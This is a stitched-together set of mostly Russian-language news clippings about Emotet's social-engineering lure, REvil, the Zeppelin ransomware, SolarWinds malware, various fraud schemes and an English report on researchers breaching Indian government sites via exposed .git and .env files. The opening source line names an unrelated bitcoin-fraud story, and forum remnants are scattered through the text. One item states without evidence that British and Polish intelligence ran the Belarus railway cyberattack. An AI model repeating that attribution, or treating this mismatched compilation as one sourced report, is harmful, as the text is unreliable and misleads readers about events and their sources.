source: protos.com/uk-police-return-8m-to-victim-of-445-bitcoin-fraud
Вредоносное ПО Emotet использует социальную инженерию для распространения
Наивные пользовали сами «открывают все двери» обновлённому вредоносу.
Разработчики вредоносной программы Emotet продолжают совершенствовать тактику распространения вредоноса. В ход снова пошла Социальная инженерия.
Троян Emotet был впервые обнаружен в 2014 году. Вирусом были атакованы клиенты немецких и австрийских банков. Злоумышленники использовали его для получения доступа к учетным данным пользователей. Со временем троян распространился по всему миру.
Позже Emotet эволюционировал в дроппер, который устанавливал другие вредоносные программы на устройства. Эти программы наносили реальный вред системе.
В 2021 году троян был побеждён после скоординированного отключения его инфраструктуры властями, однако к концу года он снова вернулся. Распространялся вирус в основном через фишинговые электронные письма.
Разработку Emotet приписывают группе киберпреступников TA542 (она же Gold Crestwood или Mummy Spider). Сейчас Emotet распространяется по модели «Вредоносное ПО как услуга». Он имеет модульную структуру и может развертывать на удалённых машинах множество компонентов для извлечения конфиденциальной информации и выполнения других вредоносных действий.
Два последних дополнения к арсеналу модулей Emotet включают «SMB spreader», предназначенный для самораспространения трояна по сети, и похититель данных банковских карт, функционирующий в браузере Google Chrome. Ещё исследователи давно заметили постоянные попытки переоснастить Emotet для распространения других вредоносных программ, вроде Bumblebee и IcedID.
В недавнем отчёте Blackberry подробно описан механизм распространения и работы свежего Emotet. Самый большой интерес вызывает то, как вообще вредонос попадает на компьютер жертвы. Происходит это при помощи тех же фишинговых писем, содержащих вредоносные .XLS файлы. Но так как Microsoft постоянно укрепляет безопасность Office, неопознанные .XLS документы из интернета сейчас автоматически открываются в режиме защищённого просмотра. Это плохая новость для Emotet, ведь записанные скрипты, фактически, блокируются на уровне приложения. Но организаторы вредоносной кампании додумались, как можно обойти это ограничение. Они написали подробную инструкцию для наивных пользователей, чтобы те сами открыли вирусу «все дорожки».
Как видно на изображении выше, в первую строку вредоносного документа хитроумные злоумышленники поместили надпись на привычном жёлтом фоне: «В соответствии с требованиями политики безопасности, для отображения содержимого документа, скопируйте этот файл в следующее местоположение и запустите повторно».
Если пользователь не счёл это сообщение подозрительным и выполнил указанные действия, — он, фактически, развязал вирусу руки. Далее Emotet запустит свои вредоносные скрипты и начнёт распространяться по локальной сети. А произойдёт это потому, что любой файл, выполняемый из местоположения «Office/Templates», игнорируется функцией защищенного просмотра, позволяя беспрепятственно запускать встроенные макросы без всякого подтверждения.
«Постоянно развиваясь в течение последних восьми с лишним лет, Emotet продолжает становиться все более изощрённым с точки зрения тактик уклонения. В него добавляют дополнительные модули для дальнейшего распространения, используют новые фишинговые кампании. Хотя Emote, возможно, бездействовал в течение нескольких месяцев, теперь он вернулся с удвоенной силой, что делает его угрозой, с которой приходится считаться как корпоративным, так и рядовым пользователям», — говорится в отчёте Blackberry.
В Москве задержан Алексей Михайлов, который мог быть замешан в крупнейшей афере последних лет: он якобы собрал с желающих купить гаджеты Apple около 200 миллионов рублей и сбежал. Как ему это удалось?
**Снился мне вчера IPhone... Всё, подумал я — влюблён.
Надо девушку бросать и мобилу себе брать.
Дом я брата заложил, чуть у мамы одолжил,
В пенсию залез к бабуле, взял ещё деньжат у друга.
Челлендж принял я мгновенно, перевёл я Лёхе деньги... **
Одни клиенты предприимчивого молодого человека теперь пишут ироничные стихи,
другие пребывают в шоке и тяжёлой депрессии, потому что потеряли миллионы
рублей. Многие влезали в крупные кредиты. Теперь их атакуют кредиторы и
коллекторы. Один из пострадавших, например, рассказал Лайфу, что лишился 10
миллионов рублей. Среди жертв вероятного обмана оказались даже тёртые оптовые
торговцы продукцией Apple.
Так выглядит АЛЕКС — Алексей Михайлов. Фото © LIFE
Общее число считающих себя обманутыми составляет около тысячи человек, которые
лишились примерно 200 миллионов рублей. Сам гений сомнительных схем —
29-летний Алексей Михайлов — подался в бега вместе со своей женой Азизой родом
из Таджикистана и украденными миллионами.
В четверг появилась информация о задержании Михайлова. Если следователи
соберут доказательства, то по статье о мошенничестве в особо крупном размере
ему может грозить до 10 лет лишения свободы.
По данным Лайфа, ранее Михайлов уже мог быть судим за мошенничество в 2017-м.
С помощью фальшивой товарной накладной его полный тёзка получил на складе
фирмы "Камчатско-сахалинская икра" деликатесы на 2,2 миллиона.
После введения против России санкций и ухода с рынка крупных западных компаний единственной возможностью получать товары стал параллельный импорт. Раньше он был под запретом, но в июне появился закон, освобождающий импортёров от уголовной и административной ответственности. Товары пошли в Россию, а часть из них даже стала стоить дешевле, чем раньше. Впрочем, цены на продукцию Apple традиционно остаются высокими.
Алексей Михайлов подписывал договоры на iPhone. Фото © LIFE
Это на руку "серым" поставщикам и мошенникам. Если первые действительно возят
небольшие партии по низкой цене, то вторые торгуют воздухом. Неприметный и
скромный москвич Алексей Михайлов не только запустил на сайтах бесплатных
объявлений масштабную аферу с фейковыми айфонами, но и смог обвести вокруг
пальца опытных перекупщиков.
Судя по отзывам потерпевших, картина была такой: в начале лета Михайлов под
аккаунтом АЛЕКС стал публиковать объявления о продаже гаджетов Apple по весьма
привлекательным ценам — на 20% ниже рынка.
Цену Михайлов объяснял параллельным импортом. Мол, товар доставлялся проверенными поставщиками прямо из ОАЭ. Однако купить новейшие модели iPhone, часы Apple Watch, планшеты iPad и ноутбуки Macbook можно было только по полной предоплате. Желающие могли оформить договор, в том числе и дистанционно.
Договоры на покупку iPhone. Фото © LIFE
Конечно же, никаких поставщиков из ОАЭ или других стран у Михайлова не было. Он использовал старый приём мошенников — создал иллюзию, что схема работает. Получив предоплату, он покупал у других "серых" продавцов продукцию Apple по полной цене и отправлял её своим клиентам. Он сознательно нёс убытки, чтобы получить на площадках бесплатных объявлений положительные отзывы, а значит, и доверие потенциальных клиентов.
Вскоре клиенты потекли рекой. Они действительно получали новые айфоны на
10–20% ниже рынка, бонусом наушники Apple и бесплатную экспресс-доставку хоть
на Дальний Восток. На доске объявлений Михайлов быстро набрал высокий рейтинг
и кучу восторженных отзывов. Однако единичные частные клиенты мало
интересовали Михайлова — они были лишь наживкой для крупных оптовиков.
Наконец молва о волшебных ценах АЛЕКСа облетела радиорынки и магазины. Матёрые
перекупщики, которые прекрасно знают "серые" схемы, не заметили подвоха и
стали заказывать крупные партии. С ними мошенник встречался лично в ресторане
"Якитория" в ТЦ "Крылья".
Скромный с виду парень спортивного телосложения в общении всегда был вежлив и
внимателен. Некоторые, попавшись на его удочку, давали ему деньги даже без
договоров, не проверяя поставщиков, не требуя чеков и накладных. Таким
Михайлов обещал телефоны почти за 40% от стоимости. Перекупщики занимали
крупные суммы у своих друзей и коллег, брали кредиты в банках.
АЛЕКС заключал договоры на партии iPhone. Фото © LIFE
Скоро начались проблемы с поставкой товара — он часто приходил в неполной комплектации. Потом стали задерживаться и оптовые партии. Михайлов объяснял это проблемами поставщиков и кормил клиентов "завтраками". В октябре многие клиенты жулика почувствовали неладное и стали искать его, требуя вернуть деньги. Некоторым он задолжал более 15 миллионов рублей. Потерпевшие стали объединяться в чатах, писать заявления в полицию и готовить коллективный иск.
Михайлов не сбегал, проводил видеоконференции с клиентами, обещая всё уладить.
На одной из них он заявил, что якобы для улаживания вопросов с поставщиками
ему нужно 15 миллионов рублей, мол, если каждый скинется по 75 тысяч, он всё
решит в короткие сроки. Жена Азиза также участвовала в конференциях,
подыгрывая мужу. Наконец продавцу надоело водить людей за нос — в прошлую
пятницу Михайлов последний раз вышел в эфир, после чего отключил телефоны и
пропал из виду.
Алексей Михайлов с женой Азизой и ребёнком. Фото © LIFE
Вряд ли Михайлов смог бы долго бегать — загранпаспорта у него нет, поэтому
границы закрыты. Для него даже лучше, что его первыми нашли сыщики угрозыска,
а не нанятый крупными оптовиками криминалитет. А для обманутых клиентов эта
история станет ещё одним уроком, когда жадность затмевает разум. Винить им
нужно только себя.
source: life.ru/p/1534635
Зафиксирован первый случай политического кибертерроризма.
Западные спецслужбы под видом неких «белорусских партизан» попытались помещать работе железнодорожной сети Белоруссии. Как сообщает американский портал «The Drive», независимая группа хакеров взяла на себя ответственность за кибератаку на железную дорогу.
Все указывает на то, что в реальности операцию проводили британская и польская спецслужбы, которые вошли в плохо защищенную компьютерную железнодорожную сеть. Известно, что в Великобритании создано специальное подразделение по ведению кибервойны с Россией, располагающее набором инструментов для подобных диверсий.
Однако их действия в основном принесли неудобства белорусским гражданам, сорвав график движения пассажирских поездов и продажу билетов. Были повреждены несколько внутренних систем. Хакеры заявили, что позволят им нормально заработать только после вывода российских войск и освобождения политических заключенных.
Это первая подобная боевая кибератака с политическими требованиями.
Правда, хакеры не добились желаемого, составы с российской военной техникой и личным составом продолжили движение на места проведения маневров, произошло лишь незначительное замедление их перемещения.
Теперь Лондону и Варшаве стоит ждать ответного удара со стороны группы британских или польских «патриотов».
В НАТО очень обеспокоены тем, какой сильный психологический эффект могут оказать предстоящие мощные маневры в Белоруссии с использованием новейших вооружений.
Киберпреступная группировка REvil (Sodinokibi) даже не думает останавливаться
после ареста десятка участников в России. Об активности злоумышленников
сообщают исследователи из компании ReversingLabs, продолжающие наблюдать за
деятельностью популярной кибергруппы.
Прошло около двух недель с момента задержания членов REvil. Напомним, что
сотрудники ФСБ России провели следственные мероприятия по 25 адресам, а под
арест попали 8 диспетчеров операторов шифровальщика из 14 задержанных.
Москве за последние год-два часто вменяли попустительство в отношении
кибергруппировок, однако задержание членов REvil и другой группировки — The
Infraud Organization продемонстрировало желание Кремля бороться с
преступностью в цифровом пространстве.
Тем не менее, как отметили в ReversingLabs, недавние аресты практически никак
не повлияли на операции REvil. Более того, группировка продолжает работать в
том же темпе, который фиксировался и до оперативно-разыскных мероприятий.
Но стоит отметить, что не только аресты в России не затронули деятельность
киберпреступников, поскольку в ноябре 2021 года Европол сообщил о задержании
операторов REvil и GandCrab. На тот момент специалисты ReversingLabs наблюдали
в среднем 47 новых семплов REvil в день (326 в неделю).
В середине лета инфраструктура REvil на какое-то время ушла в офлайн, но потом
достаточно быстро восстановила прежний уровень работы. После задержания членов
группы в России число зафиксированных в день образцов вредоноса немного
увеличилось — 24 до 26 (169 и 180 в неделю соответственно).

Пользователи выражают опасения по поводу возможных последствий встраивания криптомайнеров в антивирусы.
Как недавно сообщал SecurityLab, популярный антивирусный продукт Norton 360
теперь поставляется с программой, позволяющей пользователям майнить
криптовалюту у себя на компьютерах. Однако Norton 360 не один такой «странный»
— антивирус Avira, которым пользуются 500 млн человек по всему миру, недавно
приобрел компанию NortonLifeLock, владеющей Norton 360, и представил своим
клиентам сервис Avira Crypto.
Как и Norton 360, Avira теперь поставляется со встроенным майнером
криптовалюты, но пользователи должны включать его вручную. На странице
наиболее часто задаваемых вопросов о сервисе криптомайнинга Avira информации
представлено очень мало. Например, не указан размер взимаемой NortonLifeLock
комиссии (в случае с Norton Crypto компания получает 15% от любой
сгенерированной криптовалюты).
Похоже, что в Avira используется тот же код криптомайнера, что и в Norton
Crypto, пишет журналист Брайан Кребс. NortonLifeLock представила Avira Crypto
в октябре 2021 года, но другие антивирусы начали отмечать установщик Avira как
вредоносный или небезопасный из-за встроенного криптомайнера еще 9 сентября.
Многие постоянные пользователи Norton выражают на форумах NortonLifeLock
опасения по поводу последствий встраивания в антивирус ПО для майнинга, пусть
даже по умолчанию отключенного. Некоторые считают, что криптомайнер приведет к
увеличению счетов за электричество, и сгенерированная им криптовалюта не
сможет их покрыть. Более того, при переводе сгенерированного Norton или Avira
Crypto эфира на кошелек, с которого его потом можно вывести, взимается
комиссия, и многие пользователи не понимают, что для вывода криптовалюты ее
сумма должна превышать размер комиссионного сбора.
В августе 2021 года компания NortonLifeLock заявила о намерении приобрести
Avast, еще один популярный бесплатный антивирусный продукт, насчитывающий
порядка 500 млн пользователей. Не исключено, что вскоре миру будет представлен
еще один сервис криптомайнинга – Avast Crypto.
Добавляя в популярные антивирусные решения криптомайнер, NortonLifeLock
вовлекает сотни миллионов технически неподкованных пользователей в мир
криптовалют с его собственными уникальными проблемами безопасности и
конфиденциальности, справиться с которыми им может быть весьма трудно.
Необъяснимая неисправность в подводном телекоммуникационном кабеле, соединяющем Финляндию и Германию, нарушила услуги связи, сообщила в понедельник компания, управляющая этой связью.
Кабель C-Lion1, который соединяет Хельсинки с Ростоком в Германии, был построен и эксплуатируется финской государственной компанией Cinia.
Покрывая расстояние почти в 1200 километров (730 миль), этот кабель является единственным прямым соединением такого рода между Финляндией и Центральной Европой и проходит рядом с другими ключевыми объектами инфраструктуры, включая газопроводы и электрокабели.
Неясно, что стало причиной неисправности — Cinia заявила в своем сообщении, что все еще расследует этот вопрос. Однако сбой произошел всего через несколько недель после того, как Соединенные Штаты предупредили, что обнаружили увеличенную военную активность России вокруг ключевых подводных кабелей. Два чиновника США сообщили CNN в сентябре, что США считают, что Россия теперь с большей вероятностью может осуществить потенциальные диверсионные операции на этих критически важных объектах инфраструктуры.
Предупреждение последовало после совместного расследования общественных вещателей Швеции, Дании, Норвегии и Финляндии, которые в апреле 2023 года сообщили, что у России есть флот подозреваемых шпионских кораблей, действующих в водах Северных стран в рамках программы потенциального саботажа подводных кабелей и ветровых электростанций в регионе.
Степень разрушений, вызванных неисправностью, выявленной в понедельник, неясна. Наиболее важные потоки данных обычно проходят через несколько различных кабелей, чтобы избежать чрезмерной зависимости от одного соединения.
Оператор планирует опубликовать подробности 19/11/2024.
68-летняя пенсионерка и ее сообщники организовали в Волгограде финансовую пирамиду: они привлекали граждан, желающих взять кредиты, обещая погашать их задолженность. При этом такие кредиты они гасили средствами других граждан
Пенсионерка из Волгограда и четверо ее сообщников организовали финансовую пирамиду и с 2022 года незаконно оформили кредиты на граждан на общую сумму около 1 млрд руб. Все фигуранты задержаны по подозрению в незаконной банковской деятельности, сообщила в своем телеграм-канале официальный представитель МВД России Ирина Волк.
Как пояснила Волк, организатором группы была именно 68-летняя местная жительница, а четверо ее знакомых занимались поиском граждан, желающих получить кредиты в банках. Половину от суммы кредитов злоумышленники забирали себе, обещая погашать задолженность перед кредитными организациями. При этом оплата по договорам производилась за счет денежных средств, полученных от оформленных в дальнейшем на других граждан кредитов.
«В течение первых месяцев фигуранты самостоятельно вносили платежи от имени клиентов, в некоторых случаях даже полностью погашали взятые ими обязательства. Впоследствии граждане вновь брали кредиты, и схема повторялась. По предварительным подсчетам, с 2022 года по настоящее время соучастниками привлечено порядка 1 млрд руб.», — сообщила представительница МВД.
Click to expand...
Все подозреваемые были задержаны, в отношении них возбуждено уголовное дело по ч. 2 ст. 172 УК России (осуществление банковской деятельности без регистрации или без специального разрешения; до семи лет лишения свободы). В ходе 28 обысков у фигурантов были изъяты почти 30 млн руб., черновые записи, компьютерная техника, кредитные договоры, а также 13 дорогостоящих транспортных средств.
Как дела на заводе?
Оперативники столичного управления ГУБОПиК МВД вместе с Оперативной таможней ГТК раскрыли деятельность организованной группы из семи человек, которые, обещая пригнать под заказ из ЕС грузовики, брали деньги, но обязательства не выполняли. Об этом сообщили в МВД.
"Прошлым летом дальнобойщик из Ульяновска захотел обновить свой тягач. Нашел на популярном российском сайте по продаже авто нужный ему грузовик стоимостью ниже рыночной. Объявление было размещено от имени российской фирмы-посредника, которая переадресовала мужчину в Минск, где работала другая "контора" непосредственно по доставке грузовиков из Европы. Представители организации заверили потенциального покупателя, что авто находится в белорусской столице, он может приехать и осмотреть его лично. Мужчину встретили с поезда, отвезли в гостиницу и дали время отдохнуть с дороги, чтобы потом заняться сделкой. Встречающие были предельно вежливы и обходительны, создавая впечатление работников приличной организации", - рассказали в МВД.
Когда клиент оказался в офисе, выяснилось, что авто на самом деле находится в пункте таможенного оформления на территории Литвы. Увидеть своими глазами его не получилось бы из-за отсутствия у мужчины шенгенской визы. Но минчане заверили российского гостя, что это не проблема: можно перевести литовскому продавцу 10% от стоимости авто и забронировать машину. Мужчине показали подробный обзор с фотографиями и даже vin-номером. Передача денег прошла официально, с заключением договора.
Следующий этап - доставка. Для этого клиента направили в Молодечно, в еще одну фирму, представители которой сами должны были съездить за границу и пригнать грузовик. Там с мужчины взяли оставшиеся 90% его стоимости для расчета с литовским продавцом, все оформили официально и сказали подождать пару дней. Более того, клиенту любезно посчитали его дальнейшие расходы на оплату таможенной пошлины и утильсбора и пообещали помочь с этими процедурами.
"Через несколько дней покупателя действительно пригласили в Минск в пункт таможенного оформления для приемки грузовика. Но на месте оказалось, что это совсем не то авто, которое обещали. Оно было старше, с большим пробегом и в худшем состоянии. С данными из объявления совпадал только vin. И растаможка была в разы больше расчетной, что делало покупку нецелесообразной. Сообщив об ошибке в первоначальных подсчетах и извинившись, "бизнесмены" предложили отправить тягач обратно в Литву, а клиенту вернуть всю сумму. Он согласился",
Несколько дней после запуска процедуры возврата продавец отвечал на звонки, обещая перевести средства в течение двух недель, но потом перестал выходить на связь. Россиянин понял, что его обманули, и обратился в милицию.
Оперативники установили, что все три фирмы (в Москве, Минске и Молодечно), а также литовский продавец были связаны между собой и действовали согласованно с целью обмана клиентов. "Литовцем" выступал белорус с видом на жительство в соседней стране. Он подыскивал в продаже дешевые грузовики с малым остаточным ресурсом (за 4-7 тыс. евро) и договаривался о покупке, получая от продавца фотографию vin-номера. После этого создавал фейковые объявления о продаже тягачей (за 15-20 тыс. евро) с другими фотографиями и описанием, но используя этот vin. Его подельники в Беларуси специально вводили клиентов в заблуждение, называя суммы утильсбора и растаможки в разы меньше реальных.
Всего в преступной схеме участвовали семь человек в возрасте от 26 до 43 лет из разных регионов Беларуси и Минска. Все они задержаны. В отношении фигурантов УСК по Минску возбудило уголовное дело за мошенничество в особо крупном размере. В ходе проведения обысков у них изъяты деньги в сумме более $28 тыс., оргтехника, сим-карты, флэш-карты, печати, документы о финансово- хозяйственной деятельности юридических лиц, использовавшиеся в преступной схеме. Наложен арест на принадлежащие им автомобили (в основном премиум- брендов) на общую сумму около Br500 тыс.
Житель Ульяновска не единственный, кто пострадал от действий злоумышленников. В настоящее время потерпевшими по делу признаны еще два человека, которых обманули таким же способом. Ущерб, нанесенный им троим, составляет около Br175 тыс. Несомненно, в ходе следствия сумма ущерба и количество потерпевших вырастет, так как оперативники ГУБОПиК располагают сведениями еще о более 20 эпизодах преступной деятельности задержанных.
Оперативные мероприятия и следственные действия продолжаются.
Разработчики начали продавать новую версию вымогателя Zeppelin на подпольных форумах.
Разработчики вымогателя Zeppelin (также известного как Buran) возобновили свою преступную активность после периода затишья, начавшегося осенью прошлого года. Злоумышленники начали рекламировать новую версию вредоносного ПО на хакерском форуме в конце прошлого месяца. Об этом сообщило издание Bleeping Computer.
Разработчики новой версии вымогателя Zeppelin продают ПО на подпольных форумах, позволяя покупателям решать, как они хотят использовать вредоносное ПО. У разработчиков также есть своего рода индивидуальные партнерские отношения с определенными клиентами.
Это контрастирует с классическими бизнес-моделями RaaS, где разработчики обычно ищут партнеров для проникновения в сеть жертвы, кражи данных и установки вредоносного ПО для шифрования файлов. Затем обе стороны разделяют выкуп, а разработчики получают меньшую часть (до 30%).
Как сообщили специалисты из ИБ-фирмы Advanced Intel (AdvIntel) разработчики вымогателя Zeppelin заявили о себе в марте нынешнего года. Они объявили о «крупном обновлении программного обеспечения» вместе с новым этапом продаж. Текущая версия Zeppelin стоит $2,3 тыс. за сборку ядра. После крупного обновления разработчики Zeppelin 27 апреля выпустили новый вариант вредоносного ПО, в котором мало изменились функции, но была повышена стабильность шифрования.
«Мы продолжаем работать. Каждому пользователю мы предоставляем индивидуальные условия и лояльный подход. Напишите нам, и мы сможем договориться о взаимовыгодных условиях сотрудничества», — сообщили операторы Zeppelin.
Клиенты Zeppelin полагаются на распространенные первоначальные векторы атак, такие как RDP, уязвимости в VPN и фишинговые атаки. Кроме того, у операторов Zeppelin нет сайта утечек данных, как у большинства группировок RaaS, и они сосредоточены на шифровании данных, а не на краже.
«Лаборатория Касперского» изучила 15 торговых площадок в даркнете и обнаружила объявления о продаже трех видов запатентованных вакцин от коронавируса — Pfizer/BioNTech, AstraZeneca и Moderna, а также некоторых еще не запатентованных.
По данным исследователей, объявления размещаются преимущественно из Франции, Германии, Великобритании и США. Общение с продавцами происходит через защищенные мессенджеры с функцией удаления сообщений по таймеру. Оплата в основном требуется в биткоинах. Судя по анализу трансакций, многие авторы объявлений, обнаруженных «Лабораторией Касперского», провели от 100 до 500 операций.
«Сделать однозначный вывод, являются ли предложения о продаже вакцин в даркнете скамом или покупатели действительно получают то, что ищут, невозможно. Под некоторыми из таких объявлений были положительные отзывы. Можно предположить, что в результате части сделок люди действительно приобретали нужный товар. Теоретически это возможно, поскольку в медицинских учреждениях по всему миру при вскрытии упаковки с вакциной иногда остаются неиспользованные дозы. Однако получить гарантию, что все условия правильного хранения вакцины соблюдались, вряд ли получится. Нет гарантии и в том, что в ампулах действительно продается вакцина», — отмечает Дмитрий Галов, эксперт по кибербезопасности «Лаборатории Касперского».
Click to expand...
Также на черном рынке продаются фальшивые сертификаты о вакцинации. Например, соответствующий документ европейского образца стоит около 20-25 долларов США. Кроме того, в некоторых странах требуется справка об отсутствии COVID-19, например, для похода в офис или командировок, поездок в отпуск. В русскоязычном сегменте даркнета ее стоимость оценивается в 3500-5000 рублей.
Напомню, что в прошлом году «Хакер» тоже изучал, чем торгуют на черном рынке в связи с пандемией.
Источник: xakep.ru/2021/03/05/covid-vaccine/
В Днепре группа лиц организовала и наладила работу call-центра, работники которого мошенническим путем завладевали деньгами украинцев. Об этом сообщает "Мост Днепр" со ссылкой на пресс-службу прокуратуры Днепропетровской области.
По данным следствия, сотрудники указанного call-центра под видом работников банков и операторов связи вводили людей в заблуждение и получали номера их банковских карт, CVV-коды, СМС-коды, одноразовые пароли и тому подобное. После этого злоумышленники завладевали денежными средствами потерпевших, в дальнейшем выводили через электронные кошельки на карточные счета подставных лиц.
2 июня правоохранители провели обыск в офисном помещении call-центра, в ходе которого изъяли компьютерную технику и черновые записи.
Открыто уголовное производство по факту мошенничества, совершенного путем незаконных операций с использованием электронно-вычислительной техники (ч.3 ст.190 УК Украины). Сейчас досудебное расследование продолжается. Устанавливаются причастные к преступлению лица.
Кіберфахівці Управления СБУ в Харьковской области установили местонахождение и задержали гражданина Республики Молдова, который 5 лет находится в международном розыске по линии Интерпола.
32-летний иностранец скрывался в Украине от уголовной ответственности за совершение мошенничества в особо крупных размерах. Преступник использовал поддельные документы гражданина Украины и постоянно менял места жительства.
Согласно полученным спецслужбой данным, в течение 2013-2015 годов мужчина обманул почти на миллион долларов США десятки своих соотечественников, в том числе пенсионеров и родителей больных детей, которые собирали деньги на лечение. В апреле 2016 года молдавское правосудие признало его виновным в совершении этого преступления и приговорило к 15 годам лишения свободы.
Оперативники спецслужбы задержали международного преступника вблизи места его временного проживания в Днепре.
Сейчас решается вопрос о применении к задержанному экстрадиционного ареста.
Правоохранители проверяют возможную причастность иностранца к совершению аналогичных преступлений на территории Украины.
• Source: ssu.gov.ua/novyny/sbu-zatrymala-mizhnarodnoho-zlochyntsia-inozemets- oshukav-hromadian-na-milion-dolariv-ssha
Заместитель министра внутренних дел РФ — начальник Следственного департамента МВД Сергей Лебедев рассказал Interfax, что у участников REvil, арестованных в январе текущего года, были изъяты огромные суммы денег.
Напомню, что в середине января 2022 года ФСБ объявило об аресте 14 человек, связанных с REvil, а по 25 адресам в Москве, Санкт-Петербурге, Ленинградской и Липецкой областях прошли обыски. При этом сообщалось, что «основанием для розыскных мероприятий послужило обращение компетентных органов США».
Тогда Тверской суд Москвы заключил под стражу восемь предполагаемых участников хак-группы. Всем им были предъявлены обвинения в приобретении и хранении электронных средств, предназначенных для неправомерного осуществления перевода денежных средств, совершенных организованной группой (ч. 2 ст. 187 УК РФ). Наказание по данной статье — до семи лет лишения свободы.
Как теперь рассказал Сергей Лебедев, следователи уже провели более 50 допросов и 26 обысков, также проводится 16 технико-криминалистических и компьютерных судебных экспертиз по «делу REvil».
«В ходе расследования изъято более 300 000 000 рублей, 950 000 долларов, свыше 1 000 000 евро, флэш-накопитель с 19,9 биткоинами», — говорит Лебедев.
Click to expand...
Отмечается, что арестованные члены хак-группы также могут быть причастны к хищениям средств у граждан и юридических лиц США.
«Однако зарубежные партнеры не торопятся предоставить необходимую информацию, которая позволила бы привлечь виновных к ответственности за совершение других преступлений и восстановить нарушенные преступлениями права своих же граждан», — сказал Лебедев.
Click to expand...
источник:хакер
В прошлом году стало известно, что компания SolarWinds, которая разрабатывает для предприятий ПО, помогающее управлять их сетями, системами и инфраструктурой, подверглась взлому. Эту атаку на цепочку поставок приписывают предположительно русскоязычной хак-группе, которую ИБ-эксперты отслеживают под названиями StellarParticle (CrowdStrike), UNC2452 (FireEye) и Dark Halo (Volexity).
Проникнув в сеть SolarWinds, злоумышленники снабдили платформу Orion, предназначенную для централизованного мониторинга и управления, вредоносным обновлением. В результате множество клиентов SolarWinds установили зараженную версию платформы и, сами того не зная, впустили хакеров в свои сети. Среди пострадавших числятся такие гиганты, как Microsoft, Cisco, FireEye, а также множество правительственных агентств США, включая Госдеп и Национальное управление по ядерной безопасности.
Ранее эксперты, занимающиеся расследованием произошедшего, описывали четыре вредоноса, которые хакеры задействовали в ходе этой кампании:
На этой неделе ИБ-эксперты из Microsoft и FireEye опубликовали новые отчеты еще о трех угрозах, которые хакеры применяли во время атаки на SolarWinds и ее клиентов. В отчете Microsoft рассказывается обо всех трех вредоносах, в отчете FireEye лишь об одном из них:

Microsoft сообщает, что эти вредоносы были обнаружены в сетях некоторых пострадавших компаний, скомпрометированных в прошлом году. В некоторых случаях малварь была установлена еще в июне 2020 года, а в других случаях использовалась недавно, к примеру, в сентябре 2020 года.
Внедряли малварь разными способами. Так, некоторые жертвы были скомпрометированы с помощью вредоносного обновления Orion, тогда как другие были заражены той же малварью, но уже после того, как хакеры получили доступ к учетным данным для внутренней сети компании.
Эксперты Microsoft заявляют, что все обнаруженные угрозы связаны с тем же злоумышленником, который скомпрометировал Orion. На этот раз компания впервые официально назвала ответственную за атаку хакерскую группу, присвоив ей имя Nobelium.
«Они были созданы специально для конкретных сетей и задействовались лишь после того, как атакующие получат доступ [к сети жертвы] с помощью скомпрометированных учетных данных или бинарника SolarWinds, а также после бокового перемещения с помощью TEARDROP и других действий, выполненных вручную.
На всех этапах атаки злоумышленники демонстрировали глубокое знание программных инструментов, структур, защитных решений, распространенных в подобных сетях систем, а также методов работы, часто используемых группами реагирования на инциденты. Эти познания отражались в операционных решениях атакующих, начиная от выбора C&C-инфраструктур и заканчивая именами запланированных задач, используемых для поддержания устойчивости», — пишут в Microsoft.Click to expand...
Источник: xakep.ru/2021/03/05/more-solarwinds-malware/
Researchers have now disclosed more information on how they were able to breach multiple websites of the Indian government.
Last month, researchers from the Sakura Samurai hacking group had [partially disclosed](https://johnjhacking.com/blog/indian-government-breached-massive- amount-of-critical-vulnerabilities/) that they had breached cyber systems of Indian government after finding a large number of critical vulnerabilities.
The full findings disclosed today shed light on the routes leveraged by the
researchers, including finding exposed
.git directories and .env files on some of these systems.
Last month, ethical hackers Jackson Henry, Robert Willis, Aubrey Cottle, John Jackson, and Zultan Holder collaborated on finding vulnerabilities lurking in Indian government systems.
The reconnaissance efforts, according to the researchers, were in line with the government's NCIIPC Responsible Vulnerability Disclosure Program (RVDP).
As a result of this team exercise, the researchers found some serious flaws including 35 cases of exposed credential pairs for critical applications, publicly-reachable sensitive files exposing 13,000 PII records, dozens of police reports, etc.
The researchers also found session hijacking and remote code execution (RCE) vulnerabilities on sensitive government systems that process financial information.
But, all of this information came to light when the researchers discovered exposed .git folders and .env files on one or more Indian government subdomains.
First, Henry and Holder used ethical hacking tools to identify the subdomains to target.
Further, they identified the exposed .git and .env files on these servers that had credentials to multiple applications, databases, and servers.
One
of the exposed .env files seen by the researchers had database credentials
The .env file is often used by software applications and contains
configuration information along with usernames, passwords for application
servers and databases, such as MySQL, SMTP, PHPMailer, and Wordpress.
Likewise, the .git directory contains information about a software project codebase.
Researchers used a tool called git-dumper to obtain the contents of the publicly-accessible .git directory, and could therefore obtain files with usernames and passwords.
Further, Willis discovered a /files/ folder on a regional police department's website with heaps of PDFs in it.
These PDFs were police reports with sensitive information with some even containing forensic data.
Publicly
accessible police reports and forensic data PDFs
After persisting with their reconnaissance efforts, the researchers continued to discover even more publicly accessible files on government sites, such as SQL dumps and databases that should have remained inaccessible over the web.
Just one example below shows the nature of personally identifiable information (PII) that could be obtained by the researchers.
The table shown below contains fields like an employee's full name, date of birth, contact information, office department, and Aadhar (national identification card) number.
The
PII fields (columns) within a SQL table accessed by the researchers
By corroborating the information collected and chaining vulnerabilities
together, researchers could execute session hijacking attacks, and in some
cases remote code execution (RCE) against mission-critical government systems.
The list of government departments that the attackers found one or more security flaws in includes:
Government of Bihar
Government of Tamil Nadu
Government of Kerala
Telangana State
Maharashtra Housing and Development Authority
Jharkhand Police Department
Punjab Agro Industries Corporation Limited
Government of India, Ministry of Women and Child Development
Government of West Bengal, West Bengal SC ST & OBC Development and Finance
Corp.
Government of Delhi, Department of Power GNCTD
Government of India, Ministry of New and Renewable Energy
Government of India, Department of Administrative Reforms & Public Grievances
Government of Kerala, Office of the Commissioner for Entrance Examinations
Government of Kerala, Stationery Department
Government of Kerala, Chemical Laboratory Management System
Government of Punjab, National Health Mission
Government of Odisha, Office of the State Commissioner for Persons with
Disabilities
Government of Mizoram, State Portal
Embassy of India, Bangkok, Thailand
Embassy of India, Tehran
Consulate General of India
Government of Kerala, Service and Payroll Administrative Repository
Government of West Bengal, Directorate of Pension, Provident Fund & Group
Insurance
Government of India, Competition Commission of India
Government of Chennai, The Greater Chennai Corporation
Government of Goa, Captain of Ports Department
Government of Maharashtra
After the researchers reported the flaws via intermediary government bodies,
such as India's National Cyber Security Coordinator (NCSC) and CERT-IN, the
flaws were eventually remediated.
